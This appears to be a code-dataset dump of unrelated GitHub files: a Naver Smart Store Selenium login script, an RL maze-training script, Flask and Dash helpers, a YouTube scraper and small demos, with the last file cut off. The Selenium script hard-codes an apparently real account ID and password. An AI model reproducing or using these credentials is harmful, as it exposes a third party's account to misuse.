seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
20869179523 | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
# Log in to Naver Smart Store and print the first order's number, orderer
# name, and receiver name from the "ready to ship" (delivery) list.
smartstorelogin_url = 'https://nid.naver.com/nidlogin.login?url=https%3A%2F%2Fsell.smartstore.naver.com%2F%23%2FnaverLoginCallback%3Furl%3Dhttps%253A%252F%252Fsell.smartstore.naver.com%252F%2523'
smartstoredelevery_url = 'https://sell.smartstore.naver.com/#/naverpay/sale/delivery?summaryInfoType=DELIVERY_READY'
# SECURITY: credentials are hard-coded in source. Move them to environment
# variables or a secrets store before sharing or committing this script.
smartstore_id = 'hdh5454'
smartstore_pw = 'whdmsehgud8*'
driver = webdriver.Chrome('chromedriver')
# Smart Store login.
driver.get(smartstorelogin_url)
# FIX: the find_element_by_* helper methods were removed in Selenium 4;
# use the By-based API that this script already imports.
driver.find_element(By.NAME, 'id').send_keys(smartstore_id)
driver.find_element(By.NAME, 'pw').send_keys(smartstore_pw)
driver.find_element(By.ID, 'log.login').click()
# Open the delivery-preparation page.
driver.get(smartstoredelevery_url)
wait = WebDriverWait(driver, 10)
element = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'iframe')))
# Switch into the iframe so XPaths inside it can be resolved.
driver.switch_to.frame('__naverpay')
orderNo = driver.find_elements(By.XPATH, '//*[@data-column-name="orderNo"]/div')[1:]
orderMemberName = driver.find_elements(By.XPATH, '//*[@data-column-name="orderMemberName"]/div')
receiverName = driver.find_elements(By.XPATH, '//*[@data-column-name="receiverName"]/div')
print(orderNo[0].text)
print(orderMemberName[0].text)
print(receiverName[0].text)
| hdh4545/SSAutomation | findxpath.py | findxpath.py | py | 1,724 | python | en | code | 0 | github-code | 36 |
27792793140 | import random
import os
from model import *
from world import *
import numpy as np
import torch
import matplotlib.pyplot as plt
from datetime import datetime
# Task-variant switches: exactly one should be True.
# mem / nomem use a fixed delay; mem_vd / nomem_vd sample a variable delay.
mem, nomem, mem_vd, nomem_vd = [False, False, False, False]
mem = True
env_title = 'Tunl Mem'
if mem or nomem:
    ld = 40  # fixed delay length (time steps); also sizes the recording arrays below
elif mem_vd or nomem_vd:
    len_delays = [20, 40, 60]  # candidate delay lengths for the variable-delay tasks
    len_delays_p = [1, 1, 1]  # relative sampling weights for the candidate delays
    ld = max(len_delays)  # longest possible delay, used to size recording arrays
# Environment / reward parameters.
len_edge = 7  # length of one maze edge
rwd = 100  # reward for a correct choice
inc_rwd = -20  # penalty for an incorrect choice (memory variants only)
step_rwd = -0.1  # cost per movement step
poke_rwd = 5  # reward for a poke
rng_seed = 1234
# Instantiate the environment matching the selected task variant.
if mem:
    env = Tunl(ld, len_edge, rwd, inc_rwd, step_rwd, poke_rwd, rng_seed)
elif nomem:
    env = Tunl_nomem(ld, len_edge, rwd, step_rwd, poke_rwd, rng_seed)
elif mem_vd:
    env = Tunl_vd(len_delays, len_delays_p, len_edge, rwd, inc_rwd, step_rwd, poke_rwd, rng_seed)
elif nomem_vd:
    env = Tunl_nomem_vd(len_delays, len_delays_p, len_edge, rwd, step_rwd, poke_rwd, rng_seed)
# Network / training hyperparameters.
n_neurons = 512  # width of the LSTM and linear layers
lr = 1e-5
batch_size = 1
rfsize = 2  # conv/pool receptive-field size
padding = 0
stride = 1
dilation = 1
conv_1_features = 16
conv_2_features = 32
hidden_types = ['conv', 'pool', 'conv', 'pool', 'lstm', 'linear']
net_title = hidden_types[4]  # recurrent layer type; used in titles and output dir name
l2_reg = False
n_total_episodes = 50000
window_size = 5000 # for plotting
# Define conv & pool layer sizes
layer_1_out_h, layer_1_out_w = conv_output(env.h, env.w, padding, dilation, rfsize, stride)
layer_2_out_h, layer_2_out_w = conv_output(layer_1_out_h, layer_1_out_w, padding, dilation, rfsize, stride)
layer_3_out_h, layer_3_out_w = conv_output(layer_2_out_h, layer_2_out_w, padding, dilation, rfsize, stride)
layer_4_out_h, layer_4_out_w = conv_output(layer_3_out_h, layer_3_out_w, padding, dilation, rfsize, stride)
# Initializes network
net = AC_Net(
    input_dimensions=(env.h, env.w, 3),  # input dim (H, W, channels)
    action_dimensions=6,  # action dim
    hidden_types=hidden_types,  # hidden types
    hidden_dimensions=[
        (layer_1_out_h, layer_1_out_w, conv_1_features),  # conv
        (layer_2_out_h, layer_2_out_w, conv_1_features),  # pool
        (layer_3_out_h, layer_3_out_w, conv_2_features),  # conv
        (layer_4_out_h, layer_4_out_w, conv_2_features),  # pool
        n_neurons,
        n_neurons],  # hidden_dims
    batch_size=batch_size,
    rfsize=rfsize,
    padding=padding,
    stride=stride)
# If load pre-trained network
'''
load_dir = '2021_03_07_21_58_43_7_10_1e-05/net.pt'
parent_dir = '/home/mila/l/lindongy/tunl2d/data'
net.load_state_dict(torch.load(os.path.join(parent_dir, load_dir)))
'''
# Initializes optimizer
optimizer = torch.optim.Adam(net.parameters(), lr=lr)
def bin_rewards(epi_rewards, window_size):
    """Smooth per-episode rewards with a trailing moving average.

    Episodes before the window fills are averaged over everything seen so
    far; afterwards over the last ``window_size`` episodes.

    Args:
        epi_rewards: 1-D array of per-episode rewards.
        window_size: number of trailing episodes to average over (>= 1).

    Returns:
        float32 np.ndarray of the same length with smoothed rewards.
    """
    epi_rewards = epi_rewards.astype(np.float32)
    avg_rewards = np.zeros_like(epi_rewards)
    for i_episode in range(1, len(epi_rewards) + 1):
        if i_episode < window_size:
            # BUG FIX: the original condition `1 < i_episode < window_size`
            # skipped the first episode, leaving avg_rewards[0] == 0.
            avg_rewards[i_episode - 1] = np.mean(epi_rewards[:i_episode])
        else:
            avg_rewards[i_episode - 1] = np.mean(epi_rewards[i_episode - window_size: i_episode])
    return avg_rewards
def ideal_nav_rwd(env, len_edge, len_delay, step_rwd, poke_rwd):
    """Ideal (minimum-cost) navigation reward for a single episode.

    Call after env.reset(), since it reads env.dist_to_init. The optimal
    trajectory covers the distance to the initiation point plus three edge
    traversals, minus the portion of the delay that overlaps with walking,
    and collects three poke rewards along the way.
    """
    optimal_steps = env.dist_to_init + 3 * (len_edge - 1) - min(len_delay, len_edge - 1)
    return optimal_steps * step_rwd + 3 * poke_rwd
# Train and record
# Initialize arrays for recording (one slot per episode).
if mem_vd or nomem_vd:
    len_delay = np.zeros(n_total_episodes, dtype=np.int8) # length of delay for each trial
if mem or mem_vd:
    ct = np.zeros(n_total_episodes, dtype=np.int8) # whether it's a correction trial or not
stim = np.zeros((n_total_episodes, 2), dtype=np.int8)  # sample-stimulus location per trial
epi_nav_reward = np.zeros(n_total_episodes, dtype=np.float16)  # navigation reward per episode
correct_perc = np.zeros(n_total_episodes, dtype=np.float16)  # 1 if choice was correct, else 0
choice = np.zeros((n_total_episodes, 2), dtype=np.int8) # record the location when done
delay_loc = np.zeros((n_total_episodes, ld, 2), dtype=np.int16) # location during delay
delay_resp_hx = np.zeros((n_total_episodes, ld, n_neurons), dtype=np.float32) # hidden states during delay
delay_resp_cx = np.zeros((n_total_episodes, ld, n_neurons), dtype=np.float32) # cell states during delay
ideal_nav_rwds = np.zeros(n_total_episodes, dtype=np.float16)  # per-episode optimal baseline
for i_episode in range(n_total_episodes):
    done = False
    env.reset()
    # Baseline reward an optimal agent would collect this episode.
    ideal_nav_rwds[i_episode] = ideal_nav_rwd(env, len_edge, env.len_delay, step_rwd, poke_rwd)
    net.reinit_hid()
    stim[i_episode] = env.sample_loc
    if mem or mem_vd:
        ct[i_episode] = int(env.correction_trial)
    if mem_vd or nomem_vd:
        len_delay[i_episode] = env.len_delay # For vd only
    while not done:
        # Observation is reshaped to (channels, H, W) and batched.
        pol, val = net.forward(
            torch.unsqueeze(torch.Tensor(np.reshape(env.observation, (3, env.h, env.w))), dim=0).float()
        ) # forward
        if env.indelay: # record location and neural responses
            delay_loc[i_episode, env.delay_t - 1, :] = np.asarray(env.current_loc)
            # Snapshot the LSTM hidden and cell state at this delay step.
            delay_resp_hx[i_episode, env.delay_t - 1, :] = net.hx[
                hidden_types.index("lstm")].clone().detach().cpu().numpy().squeeze()
            delay_resp_cx[i_episode, env.delay_t - 1, :] = net.cx[
                hidden_types.index("lstm")].clone().detach().cpu().numpy().squeeze()
        act, p, v = select_action(net, pol, val)
        new_obs, reward, done, info = env.step(act)
        net.rewards.append(reward)
    choice[i_episode] = env.current_loc
    # A full reward on the final step marks a correct choice.
    if env.reward == rwd:
        correct_perc[i_episode] = 1
    epi_nav_reward[i_episode] = env.nav_reward
    # Actor-critic update at the end of each trial (discount factor 0.99).
    p_loss, v_loss = finish_trial(net, 0.99, optimizer)
# Moving-window averages for the plots below.
avg_nav_rewards = bin_rewards(epi_nav_reward, window_size)
correct_perc = bin_rewards(correct_perc, window_size)
# Make directory to save data and figures (timestamped, one per run).
directory = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + f"_{env_title}_{net_title}"
parent_dir = '/home/mila/l/lindongy/tunl2d/data'
path = os.path.join(parent_dir, directory)
os.mkdir(path)
fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(6, 6))
fig.suptitle(env_title)
ax1.plot(np.arange(n_total_episodes), avg_nav_rewards, label=net_title)
ax1.plot(np.arange(n_total_episodes), ideal_nav_rwds, label="Ideal navig reward")
ax1.set_xlabel('episode')
ax1.set_ylabel('navigation reward')
ax1.legend()
ax2.plot(np.arange(n_total_episodes), correct_perc, label=net_title)
ax2.set_xlabel('episode')
ax2.set_ylabel('correct %')
ax2.legend()
# plt.show()
fig.savefig(path+'/fig.png')
# save data (fields depend on which task variant was run)
if mem:
    np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, ct=ct, delay_loc=delay_loc,
                        delay_resp_hx=delay_resp_hx,
                        delay_resp_cx=delay_resp_cx)
elif nomem:
    np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, delay_loc=delay_loc, delay_resp_hx=delay_resp_hx,
                        delay_resp_cx=delay_resp_cx)
elif mem_vd:
    np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, ct=ct, len_delay=len_delay, delay_loc=delay_loc,
                        delay_resp_hx=delay_resp_hx, delay_resp_cx=delay_resp_cx)
elif nomem_vd:
    np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, len_delay=len_delay, delay_loc=delay_loc,
                        delay_resp_hx=delay_resp_hx, delay_resp_cx=delay_resp_cx)
# save net
torch.save(net.state_dict(), path+'/net.pt')
| dongyanl1n/sim-tunl | run.py | run.py | py | 7,488 | python | en | code | 2 | github-code | 36 |
73988252904 | known_user = ["elice", "bob", "don", "mond", "Malcom", "rees", "dewy","francis"]
# Interactive loop: greet the visitor, then either offer to remove a known
# user from the list or offer to add an unknown one. Runs until interrupted.
while True:
    print("Hi! My name is Shakib")
    name = input("What is your name? :").strip().capitalize()
    if name in known_user:
        # BUG FIX: "Hello{}!" printed e.g. "HelloBob!"; add the missing space.
        print("Hello {}!".format(name))
        # BUG FIX: the prompt said "(y\n)" -- "\n" is a newline escape;
        # the intended text is "(y/n)".
        remove = input("Would like to remove from the system (y/n)?: ").strip().lower()
        if remove == "y":
            known_user.remove(name)
        elif remove == "n":
            print("No problem!,I will not do that")
    else:
        print("i don't think i have your name in the list {}: ".format(name))
        add_me = input("would you like to be added in the system (y/n)?: ").strip().lower()
        if add_me == "y":
            known_user.append(name)
            print(known_user)
        elif add_me == "n":
            print("okay {}!, see you next time: ".format(name))
| Mobinulalamfaisal/travis-project | travis_project.py | travis_project.py | py | 928 | python | en | code | 0 | github-code | 36 |
44207415083 | import simplejson as json
import datetime
def postReports(vo):
    """Insert a (report_date, forecast_date) row into forecast.forecast_report_dates.

    *vo* is expected to begin with an ISO date (YYYY-MM-DD); only its first
    10 characters are used as the forecast date, while session['today']
    supplies the report date. Returns 'success' on commit, or an HTML
    snippet describing the failure.
    """
    from app import db, session
    try:
        print('post report')
        print(vo[0:10])
        # SECURITY FIX: the original built the INSERT by string concatenation,
        # which is vulnerable to SQL injection. Use bound parameters instead.
        sql = ("insert into forecast.forecast_report_dates "
               "(report_date, forecast_date) "
               "values (date(:report_date), date(:forecast_date))")
        session['sql_raw_reports_post'] = sql
        print(session['sql_raw_reports_post'])
        db.session.execute(sql, {'report_date': session['today'],
                                 'forecast_date': vo[0:10]})
        db.session.commit()
        return 'success'
    except Exception as e:
        # e holds description of the error
        error_text = "<p>The error:<br>" + str(e) + "</p>"
        hed = '<h1>Something is broken.</h1>'
        return hed + error_text
19525909188 | from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, status
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import random
import time
def scroll(driver):
    """Scroll *driver*'s page to the very bottom.

    Repeatedly jumps to the bottom (with a small bounce and random pauses
    to let lazy content load) until the document height stops growing.
    Any exception is caught and reported rather than propagated.
    """
    try:
        prev_height = driver.execute_script("return document.documentElement.scrollHeight")
        while True:
            pause = random.uniform(1, 2)
            driver.execute_script("window.scrollTo(0, document.documentElement.scrollHeight);")
            time.sleep(pause)
            # Bounce up slightly to trigger lazy loading.
            driver.execute_script("window.scrollTo(0, document.documentElement.scrollHeight-50)")
            time.sleep(pause)
            curr_height = driver.execute_script("return document.documentElement.scrollHeight")
            if curr_height == prev_height:
                print("스크롤 완료")
                break
            prev_height = curr_height
    except Exception as e:
        print("에러 발생: ", e)
def scrape_youtube_results(keyword):
    """Scrape YouTube search results for *keyword*.

    Launches a headless Chrome, loads the search-results page, waits for
    the first video renderer, and parses the page with BeautifulSoup.

    Returns a dict with parallel lists: 'title' (video titles) and
    'link' (absolute video URLs).
    """
    # webdriver-manager pins a chromedriver matching this Chrome version.
    service = Service(ChromeDriverManager(driver_version="111.0.5563.64").install())
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    try:
        driver = webdriver.Chrome(service=service, options=chrome_options)
    except ValueError as e:
        raise ValueError(f"웹드라이버 에러 발생! : {e}")
    # NOTE(review): only spaces are replaced with '+'; other characters are
    # not URL-encoded -- consider urllib.parse.quote_plus. Confirm intent.
    SEARCH_KEYWORD = keyword.replace(' ', '+')
    URL = "https://www.youtube.com/results?search_query=" + SEARCH_KEYWORD
    driver.get(URL)
    # scroll(driver)
    # Wait (up to 5 s) for at least one result tile before reading the DOM.
    WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, 'ytd-video-renderer')))
    html_source = driver.page_source
    soup_source = BeautifulSoup(html_source, 'html.parser')
    # Each match is a result anchor holding both the title text and href.
    content_total = soup_source.find_all(class_='yt-simple-endpoint style-scope ytd-video-renderer')
    content_total_title = list(map(lambda data: data.get_text().replace("\n", ""), content_total))
    content_total_link = list(map(lambda data: "https://youtube.com" + data["href"], content_total))
    # content_record_src = soup_source.find_all(class_='nline-metadata-item style-scope ytd-video-meta-block')
    # # content_record_src = soup_source.find_all(class_='shortViewCountText')
    # content_view_cnt = [content_record_src[i].get_text().replace('조회수 ', '') for i in range(5, len(content_record_src), 10)]
    # content_upload_date = [content_record_src[i].get_text() for i in range(6, len(content_record_src), 10)]
    # content_view_cnt = [content_record_src[i].get_text() for i in content_record_src]
    # content_upload_date = [content_record_src[i].get_text().replace('\n', '') for i in range(6, len(content_record_src), 10)]
    driver.quit()
    return {
        'title': content_total_title,
        'link': content_total_link,
        # 'view': content_view_cnt,
        # 'upload_date': content_upload_date
    }
# FastAPI router exposing the YouTube scraper under /youtube.
youtube_video = APIRouter(prefix="/youtube", tags=["유튜브"])

@youtube_video.get(
    "",
    status_code=status.HTTP_200_OK,
    summary="유튜브 스크래핑",
    description="좋아요 수, 조회수, 영상 링크, 영상 제목 스크래핑",
)
def get_video(keyword: str):
    """Search YouTube for *keyword* and return the scraped titles and links."""
    return scrape_youtube_results(keyword)
8567341457 | import numpy as np
import pandas as pd
from scipy.stats import norm
from sklearn.preprocessing import MinMaxScaler
from dash import ALL
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from contents.app import *
@app.callback(
    Output('var-plot-sliders-container', 'children'),
    Input('var-plot-sliders', 'value'),
    State('the-data', 'data'),
)
def render_var_plot_sliders(sliders, data):
    """Build one labelled RangeSlider row per selected feature.

    Each slider spans the min..max of its column ('index' uses the frame
    index). Returns [] when no feature is selected or no data is loaded.
    """
    if not (sliders and data):
        return []
    df = pd.DataFrame.from_dict(data)
    rows = []
    for col in sliders:
        series = df.index if col == 'index' else df[col]
        lo, hi = series.min(), series.max()
        rows.append(html.Div([
            html.B(col, style={'margin-top': '5px', 'white-space': 'nowrap'}),
            html.Div(style={'margin-top': '5px'}),
            html.Div([
                dcc.RangeSlider(
                    id={'type': 'var-plot-slider', 'index': col},
                    min=lo,
                    max=hi,
                    value=[lo, hi],
                    marks=None,
                    tooltip={'always_visible': False, 'placement': 'bottom'},
                )
            ], style={'width': '100%', 'margin-top': '10px'})
        ], style={'display': 'flex'}))
    return rows
@app.callback(
    Output('var-plot-container', 'children'),
    Input('var-plot-type', 'value'),
    Input('var-plot-scale-data', 'on'),
    Input('var-plot-sliders', 'value'),
    Input({'type': 'var-plot-slider', 'index': ALL}, 'value'),
    State('the-data', 'data')
)
def render_var_plot(plot_type, scale_data, feature_filters, filter_ranges, data):
    """Render a per-feature box or violin plot of the loaded data.

    Rows are first restricted by the active range sliders (column name
    'index' filters on the frame index), then optionally min-max scaled.
    Returns a one-element list with the Graph, or [] when plot_type/data
    is missing.
    """
    if plot_type and data:
        df = pd.DataFrame.from_dict(data)
        if feature_filters and filter_ranges:
            # NOTE(review): the loop variable `range` shadows the builtin;
            # harmless here but worth renaming.
            for feature, range in zip(feature_filters, filter_ranges):
                if feature == 'index': df = df[(df.index >= range[0]) & (df.index <= range[1])]
                else: df = df[(df[feature] >= range[0]) & (df[feature] <= range[1])]
        if scale_data: df = normalize_df(df)
        if plot_type == 'box':
            # One box trace per column, outliers shown as points.
            return [
                dcc.Graph(
                    figure={
                        'data': [go.Box(y=df[col], name=col, boxpoints='outliers') for col in df.columns],
                        'layout': go.Layout(
                            title='Feature Box Plot',
                            paper_bgcolor='rgba(0,0,0,0)',
                            plot_bgcolor='rgba(0,0,0,0)',
                            font=dict(color='#FFFFFF'),
                            xaxis=dict(showgrid=False),
                            yaxis=dict(showgrid=False),
                        ),
                    }
                ),
            ]
        elif plot_type == 'violin':
            # One violin trace per column, with mean line and outlier points.
            return [
                dcc.Graph(
                    figure={
                        'data': [go.Violin(y=df[col], name=col, points='outliers', meanline_visible=True) for col in df.columns],
                        'layout': go.Layout(
                            title='Feature Violin Plot',
                            paper_bgcolor='rgba(0,0,0,0)',
                            plot_bgcolor='rgba(0,0,0,0)',
                            font=dict(color='#FFFFFF'),
                            xaxis=dict(showgrid=False),
                            yaxis=dict(showgrid=False),
                        ),
                    }
                ),
            ]
    return []
@app.callback(
    Output('dist-plot-sliders-container', 'children'),
    Input('dist-plot-sliders', 'value'),
    State('the-data', 'data'),
)
def render_dist_plot_sliders(sliders, data):
    """Build one labelled RangeSlider row per selected feature.

    Mirrors render_var_plot_sliders but emits 'dist-plot-slider' ids so the
    distribution-plot callback can match them. Returns [] when no feature
    is selected or no data is loaded.
    """
    if not (sliders and data):
        return []
    df = pd.DataFrame.from_dict(data)
    rows = []
    for col in sliders:
        series = df.index if col == 'index' else df[col]
        lo, hi = series.min(), series.max()
        rows.append(html.Div([
            html.B(col, style={'margin-top': '5px', 'white-space': 'nowrap'}),
            html.Div(style={'margin-top': '5px'}),
            html.Div([
                dcc.RangeSlider(
                    id={'type': 'dist-plot-slider', 'index': col},
                    min=lo,
                    max=hi,
                    value=[lo, hi],
                    marks=None,
                    tooltip={'always_visible': False, 'placement': 'bottom'},
                )
            ], style={'width': '100%', 'margin-top': '10px'})
        ], style={'display': 'flex'}))
    return rows
@app.callback(
    Output('dist-plot-container', 'children'),
    Input('dist-plot-scale-data', 'on'),
    Input('dist-plot-feature', 'value'),
    Input('dist-plot-distributions', 'value'),
    Input('dist-plot-sliders', 'value'),
    Input({'type': 'dist-plot-slider', 'index': ALL}, 'value'),
    State('the-data', 'data'),
)
def render_dist_plot(scale_data, feature, distributions, feature_filters, filter_ranges, data):
    """Render a density histogram of *feature* with fitted theoretical curves.

    Rows are first restricted by the active range sliders ('index' filters
    on the frame index), optionally min-max scaled, then each requested
    distribution is fitted to the selected column and overlaid as a line.
    Returns the Graph, or [] when feature/distributions/data is missing.
    """
    if feature and distributions and data:
        df = pd.DataFrame.from_dict(data)
        if feature_filters and filter_ranges:
            # BUG FIX: the original loop reused the name `feature` (and
            # shadowed the builtin `range`), clobbering the selected plot
            # column with the last filter column. Use distinct loop names.
            for filter_col, bounds in zip(feature_filters, filter_ranges):
                if filter_col == 'index':
                    df = df[(df.index >= bounds[0]) & (df.index <= bounds[1])]
                else:
                    df = df[(df[filter_col] >= bounds[0]) & (df[filter_col] <= bounds[1])]
        if scale_data:
            df = normalize_df(df)
        graph = dcc.Graph(
            figure=go.Figure(
                layout=go.Layout(
                    title='Empirical vs Theoretical Distributions',
                    paper_bgcolor='rgba(0,0,0,0)',
                    plot_bgcolor='rgba(0,0,0,0)',
                    font=dict(color='#FFFFFF'),
                    xaxis=dict(
                        title=feature,
                        titlefont=dict(color='#FFFFFF'),
                        showgrid=False,
                    ),
                    yaxis=dict(
                        title='Density',
                        titlefont=dict(color='#FFFFFF'),
                        showgrid=False,
                    ),
                )
            )
        )
        # Empirical distribution of the selected feature.
        graph.figure.add_trace(
            go.Histogram(
                x=df[feature],
                name=feature,
                histnorm='probability density',
                marker=dict(color='#37699b'),
            )
        )
        for dist in distributions:
            if dist == 'normal':
                # Maximum-likelihood normal fit over the filtered column.
                mu, std = norm.fit(df[feature])
                x = np.linspace(min(df[feature]), max(df[feature]), 100)
                p = norm.pdf(x, mu, std)
                graph.figure.add_trace(
                    go.Scatter(
                        x=x,
                        y=p,
                        mode='lines',
                        name='Normal',
                    )
                )
            elif dist == 'lognormal':
                # Not implemented yet.
                pass
        return graph
    return []
# Helper Methods
def normalize_df(df):
    """Min-max scale every column of *df* into [0, 1], keeping column names.

    Pure-pandas equivalent of sklearn's MinMaxScaler with default range:
    constant columns map to 0 (a zero range is treated as 1, matching
    sklearn's zero-range handling), and unlike the original implementation
    the row index is preserved instead of being reset.
    """
    col_min = df.min()
    # Guard against division by zero for constant columns.
    col_range = (df.max() - col_min).replace(0, 1)
    return (df - col_min) / col_range
38807167453 | #%% [markdown]
# We need to create bar charts for our fancy plot to show the fraction of stuff from
# each region. We'll do that here.
#%%
# Halo group ids whose origin-fraction bar charts we want for the fancy plot.
group_ids_to_plot = [0, 431, 88, 299, 9]
#%%
from ltcaesar import read_data_from_file
import numpy as np
import matplotlib.pyplot as plt
#%%
# Use the shared stylesheet so fonts/sizes match the other paper figures.
plt.style.use("mnras_flatiron")
#%%
directory = "s50j7kAHF"
data = read_data_from_file(f"{directory}/lt/lt_outputs.hdf5")
#%% [markdown]
# We now need to calculate three things for each halo:
# + The fraction of baryonic mass from outside the halo
# + The fraction of baryonic mass from other halos
# + The fraction of baryonic mass from our own LR
#%%
def grab(x):
    """Return gas + stellar mass for attribute suffix *x* on `data`."""
    return getattr(data, f"gas_{x}") + getattr(data, f"stellar_{x}")
baryonic_mass = grab("mass_in_halo")
from_outside = grab("mass_in_halo_from_outside_lagrangian")
from_other = grab("mass_in_halo_from_other_lagrangian")
from_own = grab("mass_in_halo_from_lagrangian")
#%%
# Fractions of each halo's baryonic mass by Lagrangian-region origin.
ratio_own = from_own / baryonic_mass
ratio_other = from_other / baryonic_mass
ratio_outside = from_outside / baryonic_mass
#%%
import os
# BUG FIX: os.mkdir raised FileExistsError on re-runs; makedirs with
# exist_ok=True makes the script idempotent.
os.makedirs("barcharts", exist_ok=True)
#%%
# Make the bar charts one by one (loop var renamed to avoid shadowing
# the builtin `id`).
for group_id in group_ids_to_plot:
    fig, a = plt.subplots(figsize=(1, 1))
    a.bar(
        [0.5, 1.5, 2.5],
        [ratio_own[group_id], ratio_other[group_id], ratio_outside[group_id]],
        width=1.0,
        color=["C0", "C1", "C2"],
    )
    a.set_xticks([0.5, 1.5, 2.5])
    a.set_xticklabels(["Own", "Other", "Outside"])
    a.set_xlim(0, 3)
    a.set_ylim(0, 0.8)
    fig.tight_layout()
    fig.savefig("barcharts/group_{}.pdf".format(group_id))
#%%
| JBorrow/lagrangian-transfer-paper | figures/plotgen/create_bar_charts_fancy.py | create_bar_charts_fancy.py | py | 1,612 | python | en | code | 1 | github-code | 36 |
1842938709 | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, SelectField
from wtforms.validators import DataRequired
from wtforms import ValidationError
class MyEmailValidation(object):
    """WTForms-style validator rejecting values without an '@' character.

    Raises ValidationError with *message* (or a default) when the field's
    data does not look like an email address.
    """
    def __init__(self, message=None):
        # Fall back to the default message when none is supplied.
        self.message = message if message else "Email isn't valid."

    def __call__(self, form, field):
        if "@" not in field.data:
            raise ValidationError(self.message)
class CreateUsersForm(FlaskForm):
    """Admin form for creating a new user: destination email plus a role."""
    # Email of the account to invite; must be present and pass the basic
    # "@" check performed by MyEmailValidation.
    email = StringField("Destination email", validators=[DataRequired(), MyEmailValidation()])
    # NOTE(review): WTForms SelectField choices are (value, label) pairs, so
    # the submitted value here is the role string and the integers act as the
    # displayed labels -- confirm this ordering is intended.
    role_selector = SelectField(
        "Select role for new user",
        choices=[("admin", 3), ("moderator", 4), ("operator", 5)]
    )
    submit = SubmitField("Create user")
| a-yarohovich/control-panel | core/app/create_users/forms.py | forms.py | py | 773 | python | en | code | 0 | github-code | 36 |
8597208595 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 3 16:57:23 2022
@author: manthanprasad
"""
# Sample integers, including negatives and zero.
list1 = [25, -42, 31, 0, -85, 69]
# Print every non-negative element on one line, space-separated
# (same output as printing each with end=" ").
print(" ".join(str(num) for num in list1 if num >= 0), end=" ")
38732705628 | import time
def task_duration(start_time: float, end_time: float) -> None:
    """Print how long a task took, given its start and end times.

    Parameters:
        start_time (float): task start time in seconds.
        end_time (float): task end time in seconds.

    Returns:
        None. The duration is printed as HH:MM:SS, MM:SS, or
        "<seconds> seconds" depending on its magnitude, framed by
        divider lines.
    """
    elapsed = end_time - start_time
    total_minutes, secs = divmod(elapsed, 60)
    hours, minutes = divmod(int(total_minutes), 60)
    secs = round(secs, 2)
    if hours > 0:
        formatted = f"{hours:02d}:{minutes:02d}:{int(secs):02d}"
    elif minutes > 0:
        formatted = f"{minutes:02d}:{int(secs):02d}"
    else:
        formatted = f"{secs} seconds"
    print(100 * '-')
    print("Task took:", formatted)
    print(100 * '-')
| IgMann/MLOps-MNIST-project | Deployment/task_duration.py | task_duration.py | py | 952 | python | en | code | 0 | github-code | 36 |
25547162312 | from operator import itemgetter, attrgetter
class Student:
    """Simple record of a student's name, letter grade, and age."""

    def __init__(self, name, grade, age):
        self.name, self.grade, self.age = name, grade, age

    def __repr__(self):
        # Render the record as a plain tuple, e.g. ('john', 'A', 15).
        return repr((self.name, self.grade, self.age))
def t_sorted():
    """Demonstrate sorted()/list.sort() with key functions and operator helpers."""
    print(sorted([5, 2, 3, 1, 4]))
    a = [5, 2, 3, 1, 4]
    a.sort()
    print(a)
    # Duplicate keys in a dict literal are overwritten; sorted() on a dict
    # yields its keys.
    print(sorted({1: 'D', 4: 'B', 3: 'B', 2: 'E', 5: 'A'}))
    print(sorted("This is a test string from Andrew".split(), key=str.lower))
    student_tuples = [
        ('john', 'A', 15),
        ('jane', 'B', 12),
        ('dave', 'B', 10),
    ]
    print(sorted(student_tuples, key=lambda student: student[2]))
    print(sorted(student_tuples, key=itemgetter(2)))
    # itemgetter supports sorting by multiple keys (grade, then age).
    print(sorted(student_tuples, key=itemgetter(1,2)))
    student_objects = [
        Student('john', 'A', 15),
        Student('jane', 'B', 12),
        Student('dave', 'B', 10),
    ]
    print(sorted(student_objects, key=lambda student: student.age))
    print(sorted(student_objects, key=attrgetter('age')))
    print(sorted(student_objects, key=attrgetter('grade', 'age')))
# Run the sorting demonstrations only when executed as a script.
if __name__ == '__main__':
    t_sorted()
| cool8sniper/coolpython | coolpthon/others/sorted_t.py | sorted_t.py | py | 1,225 | python | en | code | 1 | github-code | 36 |
34837660944 | from IPython.display import clear_output
def basic_info():
    """Greet the players and collect both user names interactively.

    Each name is re-prompted until the player confirms it with 'Y'.
    Returns [user1, user2].
    """
    print("Welcome to Tic Tac Toe Board Game.")
    choice = "Wrong"
    choice1 = 'Wrong'
    # Loop until player 1 confirms their name.
    while choice != 'Y':
        user1 = input("Please Your Name as User 1: ")
        choice = input(f"Your Name is {user1}, Correct? Y or N: ").upper()
    # Loop until player 2 confirms their name.
    while choice1 != 'Y':
        user2 = input("Please Your Name as User 2: ")
        choice1 = input(f"Your Name is {user2}, Correct? Y or N: ").upper()
    return [user1,user2]
def board_pattern():
    """Return the initial 3x3 board: three rows of cell labels "1".."9"."""
    return [[str(3 * row + col + 1) for col in range(3)] for row in range(3)]
def playing():
    """Play one game on a fresh board.

    Repeatedly reads "position,mark" from the user, places the mark,
